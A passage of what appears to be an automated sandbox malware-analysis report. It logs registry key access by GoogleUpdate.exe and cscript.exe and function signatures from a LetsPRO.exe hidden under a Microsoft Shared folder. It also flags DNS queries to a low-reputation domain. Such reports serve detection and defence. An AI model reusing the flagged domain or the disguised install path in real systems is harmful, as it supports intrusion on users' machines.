                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C950BF3 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C950BF3
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94CB0B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,5_2_6C94CB0B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9507B2 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C9507B2
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94C7E5 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,5_2_6C94C7E5
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C917CAD _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C917CAD
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94FE26 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94FE26
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DFA9 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,5_2_6C94DFA9
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F945 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F945
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DAA8 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,5_2_6C94DAA8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F48B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F48B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94D56F _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,5_2_6C94D56F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C951054 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C951054
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94F051 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,5_2_6C94F051
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00254318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,8_2_00254318
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00265490 FindFirstFileExW,8_2_00265490
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001CBAB FindFirstFileExW,16_2_0001CBAB
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012DB25 FindFirstFileExW,30_2_0012DB25
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDB6417 FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose,30_2_6CDB6417
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC98E75 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose,30_2_6CC98E75
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC98FBC GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,30_2_6CC98FBC
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9ED9F FindFirstFileW,FindNextFileW,FindClose,30_2_6CC9ED9F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9AA6F FindFirstFileW,FindNextFileW,FindClose,30_2_6CC9AA6F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCCA66F FindFirstFileW,FindClose,FindNextFileW,30_2_6CCCA66F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC98D3E FindFirstFileW,FindNextFileW,GetLastError,FindClose,30_2_6CC98D3E
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F380F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_03F380F0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4x nop then jo 6C931931h5_2_6C9084A8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4x nop then mov byte ptr [ebp-00000090h], FFFFFFFEh5_2_6C8FF4A2
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4x nop then push esi5_2_6C8FF6B0

                  Networking

                  barindex
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: 156.248.54.11.webcamcn.xyz
                  Source: Joe Sandbox ViewASN Name: Africa-on-Cloud-ASZA Africa-on-Cloud-ASZA
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_025F3330 recv,timeGetTime,_memmove,4_2_025F3330
                  Source: global trafficDNS traffic detected: DNS query: 156.248.54.11.webcamcn.xyz
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
